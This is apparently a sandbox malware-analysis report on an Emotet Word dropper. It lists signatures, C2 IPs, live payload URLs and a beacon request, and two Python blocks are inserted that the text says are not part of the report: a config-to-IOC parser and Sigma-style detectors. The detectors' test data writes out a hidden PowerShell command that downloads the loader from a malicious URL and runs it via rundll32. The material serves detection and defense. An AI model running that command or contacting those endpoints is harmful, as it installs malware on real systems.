Windows Analysis Report 1711.doc

Overview

General Information

Sample Name: 1711.doc
Analysis ID: 526179
MD5: 85ab297345c97bca1a5004dc537f6c1c
SHA1: 0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256: 31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Document has an unknown application name
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Document contains no OLE stream with summary information
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

AV Detection:

Antivirus detection for URL or domain
Source: https://staviancjs.com/wp-forum/QOm4n2/ Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split Avira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 21.2.rundll32.exe.30146b8.1.raw.unpack Malware Configuration Extractor: Emotet
    {
      "Public Key": [
        "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0",
        "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"
      ],
      "C2 list": [
        "51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080",
        "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080",
        "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080",
        "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443",
        "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"
      ]
    }
Multi AV Scanner detection for submitted file
Source: 1711.doc Virustotal: Detection: 39%
Source: 1711.doc Metadefender: Detection: 20%
Source: 1711.doc ReversingLabs: Detection: 57%
Multi AV Scanner detection for domain / URL
Source: alfaofarms.com Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\13791789.dll Metadefender: Detection: 34%
Source: C:\ProgramData\13791789.dll ReversingLabs: Detection: 81%
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy) Metadefender: Detection: 34%
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy) ReversingLabs: Detection: 81%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615CD1EE FindFirstFileExA, 14_2_615CD1EE

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.5:49752 -> 72.167.40.83:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: thepilatesstudionj.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.5:49794 -> 51.178.61.60:443
Source: winword.exe Memory has grown: Private usage: 0MB later: 76MB

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 45.79.33.48 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 168.197.250.14 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.178.61.60 187
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 51.178.61.60:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 45.79.33.48:8080
Source: Malware configuration extractor IPs: 196.44.98.190:8080
Source: Malware configuration extractor IPs: 177.72.80.14:7080
Source: Malware configuration extractor IPs: 51.210.242.234:8080
Source: Malware configuration extractor IPs: 185.148.169.10:8080
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 195.154.146.35:443
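The configuration blob printed under "Found malware configuration" and the C2 list above are the report's raw extractor output. The following is an added example, not part of the report and not the sandbox's own extractor code, that turns that blob into checked IOCs. It copies the extracted configuration verbatim, parses the two base64 "Public Key" entries as Windows CNG BCRYPT_ECCKEY_BLOB structures (4-byte magic, little-endian coordinate length, then big-endian X and Y; the magic "ECS1" denotes an ECDSA P-256 public key and "ECK1" an ECDH P-256 public key), and validates each C2 entry as an IP:port pair. The P-256 on-curve check is an extra sanity test written here; the report itself performs no such check.

```python
"""Parse the Emotet configuration printed by the report into checked IOCs.

CONFIG below is copied verbatim from the report's "Found malware
configuration" entry. The key blobs follow the CNG BCRYPT_ECCKEY_BLOB
layout: magic (4 bytes), cbKey (u32 LE), X (cbKey bytes), Y (cbKey bytes).
"""
import base64
import ipaddress
import struct

CONFIG = {
    "Public Key": [
        "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0",
        "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW",
    ],
    "C2 list": [
        "51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080",
        "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080",
        "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080",
        "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443",
        "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443",
    ],
}

# BCRYPT_ECDSA_PUBLIC_P256_MAGIC and BCRYPT_ECDH_PUBLIC_P256_MAGIC from bcrypt.h.
KEY_KINDS = {b"ECS1": "ECDSA P-256 public key", b"ECK1": "ECDH P-256 public key"}

# NIST P-256 parameters, used only by the sanity check below.
P256_P = 2**256 - 2**224 + 2**192 + 2**96 - 1
P256_A = P256_P - 3
P256_B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B


def on_p256_curve(x: int, y: int) -> bool:
    """True if (x, y) satisfies y^2 = x^3 + a*x + b over GF(p) for P-256."""
    return (y * y - (x * x * x + P256_A * x + P256_B)) % P256_P == 0


def parse_ecc_blob(b64: str) -> dict:
    """Decode one base64 BCRYPT_ECCKEY_BLOB and split it into its fields."""
    raw = base64.b64decode(b64)
    magic, cb_key = struct.unpack_from("<4sI", raw, 0)
    if magic not in KEY_KINDS:
        raise ValueError(f"unexpected key blob magic {magic!r}")
    if len(raw) != 8 + 2 * cb_key:
        raise ValueError(f"blob is {len(raw)} bytes, expected {8 + 2 * cb_key} for cbKey={cb_key}")
    x = int.from_bytes(raw[8:8 + cb_key], "big")          # coordinates are big-endian
    y = int.from_bytes(raw[8 + cb_key:8 + 2 * cb_key], "big")
    return {"magic": magic.decode(), "kind": KEY_KINDS[magic], "cb_key": cb_key,
            "x": x, "y": y, "on_curve": on_p256_curve(x, y)}


def parse_c2_list(entries: list) -> list:
    """Turn "ip:port" strings into validated (ip, port) tuples."""
    c2 = []
    for entry in entries:
        host, _, port = entry.rpartition(":")
        ip = ipaddress.ip_address(host)   # rejects anything that is not an address
        port = int(port)
        if not 0 < port < 65536:
            raise ValueError(f"bad port in {entry!r}")
        c2.append((str(ip), port))
    return c2


def summarize(config: dict) -> dict:
    keys = [parse_ecc_blob(k) for k in config["Public Key"]]
    c2 = parse_c2_list(config["C2 list"])
    return {"keys": keys, "c2": c2, "ports": sorted({port for _, port in c2})}


if __name__ == "__main__":
    s = summarize(CONFIG)
    for k in s["keys"]:
        print(f'{k["magic"]}: {k["kind"]}, cbKey={k["cb_key"]}, on_curve={k["on_curve"]}')
    print(f'{len(s["c2"])} C2 endpoints on ports {s["ports"]}')
    for ip, port in s["c2"]:               # one blocklist line per endpoint
        print(f"block {ip} tcp/{port}")
```

The magic check matters in practice: an extractor that mislabels the ECDH key as the ECDSA key (or vice versa) produces a configuration that looks complete but cannot be used to verify or decrypt traffic, and the length check catches a truncated blob before it is handed to any crypto library.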
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1
    Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=
    Host: 51.178.61.60
    Connection: Keep-Alive
    Cache-Control: no-cache
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: thepilatesstudionj.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: alfaofarms.com
    Connection: Keep-Alive
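The Sigma hits in the Signatures list (Microsoft Office Product Spawning Windows Shell, Windows Suspicious Use Of Web Request in CommandLine, Emotet RunDLL32 Process Creation) and the "System process connects to network" and "HTTP GET or POST without a user agent" findings describe the same chain: WINWORD.EXE starts cmd.exe, PowerShell fetches the loader into C:\ProgramData, and rundll32.exe hosts it and beacons to the C2 list. Below is an added example, not part of the report and not the Sigma project's rules, that implements approximations of those checks over constructed events. The image paths, dropped-DLL path, URLs, IPs and the beacon request are taken from the report; the command lines and keyword lists are assumptions, since the report prints neither the actual command lines nor the rule logic.

```python
"""Sigma-style checks for the Emotet delivery chain the report describes.

Events below are constructed to mirror the report's process tree and
traffic; they are not records exported from the sandbox. Keyword lists are
approximations of the public Sigma rules (assumption).
"""
import ipaddress
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WEB_REQUEST_KEYWORDS = ("invoke-webrequest", "iwr ", "net.webclient",
                        "downloadstring", "downloadfile", "curl ", "wget ")


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str = ""


@dataclass
class NetworkEvent:
    image: str
    dest_ip: str
    dest_port: int


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev: ProcessEvent) -> bool:
    return basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SHELLS


def web_request_in_cmdline(ev: ProcessEvent) -> bool:
    cl = ev.command_line.lower()
    return any(k in cl for k in WEB_REQUEST_KEYWORDS)


def rundll32_loads_programdata_dll(ev: ProcessEvent) -> bool:
    # The report's loader lives at C:\ProgramData\13791789.dll; a DLL hosted
    # from that directory by rundll32 is the signal this check keys on.
    cl = ev.command_line.lower()
    return basename(ev.image) == "rundll32.exe" and "\\programdata\\" in cl and ".dll" in cl


def rundll32_connects_out(ev: NetworkEvent) -> bool:
    # "System process connects to network": rundll32 reaching a public address.
    return basename(ev.image) == "rundll32.exe" and not ipaddress.ip_address(ev.dest_ip).is_private


def http_request_without_user_agent(raw: str) -> bool:
    """True for a request whose Host is a bare IP and that carries no User-Agent."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    host = headers.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return "user-agent" not in headers


def evaluate(proc_events, net_events, http_requests) -> list:
    """Return (rule, subject) pairs for every event that matches a check."""
    hits = []
    for ev in proc_events:
        if office_spawns_shell(ev):
            hits.append(("office_spawns_shell", basename(ev.image)))
        if web_request_in_cmdline(ev):
            hits.append(("web_request_in_cmdline", basename(ev.image)))
        if rundll32_loads_programdata_dll(ev):
            hits.append(("rundll32_programdata_dll", basename(ev.image)))
    for ev in net_events:
        if rundll32_connects_out(ev):
            hits.append(("rundll32_connects_out", ev.dest_ip))
    for req in http_requests:
        if http_request_without_user_agent(req):
            hits.append(("http_no_user_agent", req.split(" ", 2)[1]))
    return hits


# Constructed sample data. Command lines are stand-ins (the report does not print them).
WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE"
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PROC_EVENTS = [
    ProcessEvent(WINWORD, r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", WINWORD, "cmd /c powershell"),
    ProcessEvent(PS_EXE, r"C:\Windows\SysWOW64\cmd.exe",
                 "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                 "'http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/',"
                 r"'C:\ProgramData\13791789.dll')"),
    ProcessEvent(r"C:\Windows\SysWOW64\rundll32.exe", PS_EXE,
                 r"rundll32.exe C:\ProgramData\13791789.dll,#1"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"),   # benign control
    ProcessEvent(PS_EXE, r"C:\Windows\explorer.exe", "powershell Get-Process"),  # benign control
]
NET_EVENTS = [
    NetworkEvent(r"C:\Windows\SysWOW64\rundll32.exe", "45.79.33.48", 8080),
    NetworkEvent(r"C:\Windows\SysWOW64\rundll32.exe", "51.178.61.60", 443),
    NetworkEvent(r"C:\Windows\SysWOW64\rundll32.exe", "192.168.2.1", 53),   # private: no hit
]
HTTP_REQUESTS = [
    # the report's beacon, cookie value shortened: bare-IP Host, no User-Agent
    "GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1\r\nCookie: ZY=3bqR+TDsaw4ISdWheUyZ7\r\n"
    "Host: 51.178.61.60\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    # the PowerShell download stage: has a User-Agent and a hostname, so no hit
    "GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT; "
    "Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1\r\nHost: thepilatesstudionj.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]

if __name__ == "__main__":
    for rule, subject in evaluate(PROC_EVENTS, NET_EVENTS, HTTP_REQUESTS):
        print(f"{rule:26} {subject}")
```

Note that the download stage is not caught by the user-agent check: it sends the stock WindowsPowerShell user agent to a real hostname, which is why the report lists it separately under "Uses a known web browser user agent". The command-line check catches it instead, which is the reason to run process and network telemetry through the same evaluation rather than relying on either alone.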
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: EcobandGH
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.148.81.119
Source: Joe Sandbox View IP Address: 196.44.98.190
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49796 -> 45.79.33.48:8080
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000005.00000002.339928145.0000000004958000.00000004.00000001.sdmp String found in binary or memory: http://alfaofarms.com4
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000003.511663984.0000000003096000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmp String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000005.00000003.306337007.0000000007819000.00000004.00000001.sdmp String found in binary or memory: http://crl.verisign.
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/9aTcv/.Split.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/In
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Tcv/.Splitplit0.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngp
Source: powershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp String found in binary or memory: http://thepilatesstudionj.co
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://thepilatesstudionj.com
Source: powershell.exe, 00000005.00000002.343856415.0000000004E23000.00000004.00000001.sdmp String found in binary or memory: http://thepilatesstudionj.com/wp-conte
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5U
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCK
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14/563209-4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14/W
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14/h
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://168.197.250.1480/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://168.197.250.14:80/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://168.197.250.14:80/y
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://45.79.33.48/a
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48/s
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48:8080/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48:8080/0
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48:8080/2
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://45.79.33.48:8080/a
Source: rundll32.exe, 00000015.00000002.535047185.0000000002FF0000.00000004.00000020.sdmp String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVo
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoU
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoryptography
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVou/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://51.178.61.60/E
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
